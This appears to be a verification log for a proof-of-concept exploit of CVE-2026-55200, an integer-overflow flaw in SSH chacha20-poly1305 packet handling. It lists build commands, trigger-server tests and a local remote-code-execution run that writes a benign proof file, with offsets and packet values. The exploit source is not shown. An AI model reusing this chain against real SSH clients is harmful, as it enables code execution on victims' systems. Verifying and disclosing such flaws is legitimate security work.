87 lines
2.5 KiB
Plaintext
87 lines
2.5 KiB
Plaintext
Repository HEAD during verification:
|
|
11dde2a60003651746366dc346633a66926f9480
|
|
|
|
Compiler:
|
|
gcc.exe (MinGW-W64 x86_64-ucrt-posix-seh, built by Brecht Sanders, r7) 15.2.0
|
|
|
|
Python:
|
|
Python 3.13.12
|
|
|
|
Arithmetic verifier build command:
|
|
gcc -std=c11 -Wall -Wextra -O0 -g -o cve_2026_55200_probe.exe .\poc\cve_2026_55200_probe.c
|
|
|
|
Arithmetic verifier run:
|
|
.\cve_2026_55200_probe.exe
|
|
|
|
benign CVE-2026-55200 proof
|
|
build_size_t_bytes=8
|
|
build_size_t_bits=64
|
|
packet_length=0xffffffff (4294967295)
|
|
mac_len=0
|
|
auth_len=16
|
|
mathematical_total=4294967315
|
|
vulnerable32_decision=accepted
|
|
vulnerable32_total=19
|
|
vulnerable32_allocation=19
|
|
fullpacket_style_length=4294967294
|
|
allocation_gap=4294967275
|
|
fixed32_decision=rejected: out of boundary
|
|
native_unpatched_decision=accepted
|
|
native_unpatched_total=19
|
|
native_note=source-shaped integer expression wraps before assignment into 64-bit size_t
|
|
result=PASS
|
|
|
|
Trigger self-test:
|
|
python .\poc\libpwn_cve_2026_55200_server.py --self-test
|
|
|
|
[self-test] chacha20-poly1305@openssh.com packet generator
|
|
packet_length=0xffffffff (4294967295)
|
|
encrypted_fragment_len=28
|
|
filler_len=64
|
|
body_len=8
|
|
vulnerable_c_expression_accepted=True
|
|
vulnerable_c_expression_allocation=19
|
|
fixed_rejects=True
|
|
fullpacket_style_length=4294967294
|
|
allocation_gap=4294967275
|
|
[self-test] PASS
|
|
|
|
Trigger loopback test:
|
|
python .\poc\libpwn_cve_2026_55200_server.py --loopback-test --hold-open 0
|
|
|
|
[+] client ident: SSH-2.0-libpwn-local-libssh2-mock
|
|
[+] negotiated curve25519-sha256 / rsa-sha2-256 / chacha20-poly1305@openssh.com
|
|
[+] sent SSH_MSG_NEWKEYS
|
|
[+] received client SSH_MSG_NEWKEYS
|
|
[+] sent malformed chacha/poly1305 trigger at server seq=3
|
|
[+] trigger bytes=92 packet_length=0xffffffff
|
|
[loopback-test] minimal SSH handshake/key-derivation path
|
|
decrypted_trigger_packet_length=0xffffffff (4294967295)
|
|
encrypted_trigger_fragment_len=28
|
|
[loopback-test] PASS
|
|
|
|
Local RCE harness build command:
|
|
gcc -O0 -g -Wall -Wextra -o poc\libpwn_local_rce_harness.exe poc\libpwn_local_rce_harness.c
|
|
|
|
Local RCE exploit run:
|
|
python .\poc\libpwn_local_rce_exploit.py
|
|
|
|
LEAK exec_callback=<runtime address> callback_offset=24 command_offset=32 ptr_size=8
|
|
accepted packet_length=0xffffffff allocation=19 copy_len=180 body_len=180
|
|
exec_callback command=cmd /c echo libpwn-rce-verified><repo>\poc\libpwn_rce_proof.txt
|
|
system_rc=0
|
|
process_rc=0
|
|
payload_len=180
|
|
proof_path=<repo>\poc\libpwn_rce_proof.txt
|
|
RCE_PROOF=PASS
|
|
|
|
Proof file:
|
|
Get-Content -Raw .\poc\libpwn_rce_proof.txt
|
|
|
|
libpwn-rce-verified
|
|
|
|
Python syntax check:
|
|
python -m py_compile .\poc\libpwn_cve_2026_55200_server.py .\poc\libpwn_local_rce_exploit.py
|
|
|
|
exit status: 0
|